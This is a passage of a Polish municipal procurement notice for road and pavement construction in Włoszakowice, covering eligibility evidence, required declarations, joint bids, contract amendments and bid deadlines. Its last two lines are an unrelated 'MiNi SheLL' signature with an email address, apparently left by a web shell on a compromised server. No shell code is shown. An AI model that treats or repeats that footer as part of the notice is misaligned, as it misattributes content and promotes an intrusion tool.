wymaga Zamawiający: w<br/>celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu:<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Zamawiający w celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu<br/>na podstawie art. 109 ust. 1 pkt 4) ustawy Pzp skorzysta z dokumentów znajdujących się w<br/>ogólnodostępnych i bezpłatnych bazach danych pod warunkiem wskazania przez Wykonawcę w<br/>oświadczeniu o którym mowa w Rozdziale VII ust. 1 SWZ (Załącznik nr 2 do SWZ), danych umożliwiających dostęp do tych dokumentów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp Zamawiający wezwie Wykonawcę,<br/>którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni<br/>od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia,<br/>potwierdzających spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia, które<br/>wymaga Zamawiający:<br/>1) W celu potwierdzenia spełniania warunku udziału w postępowaniu dotyczącego sytuacji<br/>ekonomicznej określonego w Rozdziale V ust. 2 pkt 3) SWZ:<br/>a) dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną<br/>określoną przez Zamawiającego.<br/>2) W celu potwierdzenia spełniania warunku udziału w postępowaniu dotyczącego zdolności<br/>zawodowej określonego w Rozdziale V ust. 2 pkt 4) lit. a) SWZ:<br/>a) Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami<br/>budowlanymi wraz informacji na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zadania publicznego, a także zakresu wykonywanych przez nie czynności<br/>oraz informacją o podstawie do dysponowania tymi osobami (Załącznik nr 6 do SWZ).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokumenty, które należy złożyć:<br/>1) Formularz oferty – Załącznik nr 1 do SWZ;<br/>Dokumenty składane wraz z ofertą:<br/>1) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału<br/>w postępowaniu (oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp) – Załącznik nr 2<br/>do SWZ,<br/>2) Oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału (oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp) – Załącznik nr 3 do SWZ, (w sytuacji, kiedy Wykonawca w celu wykazania spełnienia warunków<br/>udziału w postępowaniu polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby),<br/>3) Zobowiązanie podmiotu udostępniającego zasoby (w sytuacji, kiedy Wykonawca w celu<br/>wykazania spełnienia warunków udziału w postępowaniu polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby)- Załącznik nr 4 do SWZ,<br/>4) Oświadczenie dotyczące rodzajów robót wykonywanych przez poszczególne podmioty<br/>występujące wspólnie (w przypadku oferty składanej wspólnie przez Wykonawców) – Załącznik<br/>nr 5 do SWZ,<br/>5) Pełnomocnictwo upoważaniające do złożenia oferty, o ile ofertę składa pełnomocnik lub<br/>pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania<br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>3) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane.<br/>4) W przypadku, o którym mowa w pkt 3) powyżej, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane wykonają poszczególni Wykonawcy (Załącznik nr 5 do SWZ) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z postanowieniami art. 455 ust. 1 ustawy - Prawo zamówień publicznych Zamawiający<br/>przewiduje możliwość dokonania zmian w umowie o udzielenie zamówienia publicznego po jej<br/>zawarciu, pod warunkiem podpisania aneksu zaakceptowanego przez obie Strony. W<br/>szczególności Zamawiający, dopuszcza:<br/>1. Zmianę terminu realizacji przedmiotu Umowy w następujących przypadkach:<br/>1) spowodowanych niekorzystnymi warunkami atmosferycznymi, geologicznymi, archeologicznymi,<br/>w szczególności:<br/>a) klęski żywiołowe,<br/>b) wyjątkowo niekorzystne (udokumentowane przez Wykonawcę i potwierdzone przez<br/>Zamawiającego) warunki atmosferyczne, uniemożliwiające prawidłowe prowadzenie robót<br/>budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności z<br/>powodu technologii realizacji robót określonej Umową, normami lub innymi przepisami,<br/>wymagającej konkretnych warunków atmosferycznych, jeżeli konieczność wykonania robót w<br/>tym okresie nie jest następstwem okoliczności, za które Wykonawca odpowiada. Poprzez<br/>wyjątkowo niekorzystne warunki atmosferyczne rozumieć należy długotrwałe wystąpienie bardzo<br/>niskich temperatur i silnych podmuchów wiatru uniemożliwiających wykonanie określonych prac<br/>z uwagi na technologię i technikę wykonywanych robót, w tym wymaganych technologii przez<br/>producentów stosowanych materiałów i urządzeń. W takim przypadku termin wykonania<br/>przedmiotu Umowy może zostać przesunięty o czas trwania przyczyn od Wykonawcy<br/>niezależnych oraz o czas trwania ich następstw.<br/>c) wystąpienie warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w<br/>sposób istotny od przyjętych w dokumentacji projektowej, rozpoznania terenu w zakresie<br/>znalezisk archeologicznych, wstępowania niewybuchów lub niewypałów, które mogą skutkować<br/>niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy. W takim przypadku termin<br/>wykonania przedmiotu Umowy może zostać przesunięty o czas trwania przyczyn niezależnych<br/>od Wykonawcy oraz o czas trwania ich następstw.<br/>d) odkrycia w trakcie robót budowlanych niewypałów i niewybuchów,<br/>e) odkrycia w trakcie robót budowlanych obiektów podziemnych wymagających wcześniejszej<br/>rozbiórki lub usunięcia,<br/>f) odkrycia przedmiotu względem, którego powstanie przypuszczenie, że jest on zabytkiem, co<br/>oznaczać będzie konieczność wstrzymania robót lub takiego ich wykonania, aby zabytek nie<br/>został zniszczony, ale zabezpieczony jako przedmiot archeologiczny i miejsce jego znaleziska,<br/>g) stwierdzenia innego usytuowania obiektów podziemnych lub podziemnych sieci uzbrojenia<br/>terenu niż wynikające z ewidencji geodezyjnej, co będzie wymagało odpowiednich zmian w<br/>opracowaniach projektowych lub sposobie wykonania robót,<br/>2) będących następstwem okoliczności leżących po stronie Zamawiającego, w szczególności:<br/>a) nieterminowe przekazanie terenu budowy przez Zamawiającego,<br/>b) wstrzymanie robót przez Zamawiającego,<br/>c) konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej,<br/>d) opóźnienia w procedurze wyboru Inspektora Nadzoru inwestorskiego,<br/>3) z przyczyn zależnych od Zamawiającego, których nie można było przewidzieć w chwili<br/>zawarcia Umowy.<br/>W takim przypadku termin realizacji przedmiotu Umowy może zostać przesunięty o czas trwania<br/>przyczyn leżących po stronie Zamawiającego oraz o czas trwania ich następstw,<br/>4) zwłoki w działaniu instytucji opiniujących, uzgadniających oraz wydających decyzje<br/>administracyjne ponad czas (termin) wynikający z przepisów prawa,<br/>Pozostałe warunki zmian zostały zwarte we wzorze umowy stanowiącym załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-17 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/wloszakowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-17 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zgodnie z art. 95 ustawy Pzp Zamawiający wymaga zatrudnienia przez Wykonawcę lub<br/>Podwykonawcę na podstawie umowy o pracę w rozumieniu przepisów art. 22 § 1 ustawy z dnia<br/>26 czerwca 1974r. – Kodeks pracy (tj. Dz. U. z 2020r. poz. 1320), osób wykonujących<br/>następujące czynności w zakresie realizacji zamówienia:<br/>- roboty ziemne,<br/>- wykonanie podbudowy,<br/>- wykonanie nawierzchni,<br/>- montaż elementów ulic, chodników, za wyjątkiem osób wykonujących samodzielne funkcje w<br/>budownictwie.<br/>Zamawiający wymaga, aby osoby, którymi Wykonawca lub Podwykonawca będzie się<br/>posługiwał przy wykonywaniu czynności wskazanych powyżej, były zatrudnione na podstawie<br/>umowy o pracę w całym okresie obowiązywania umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com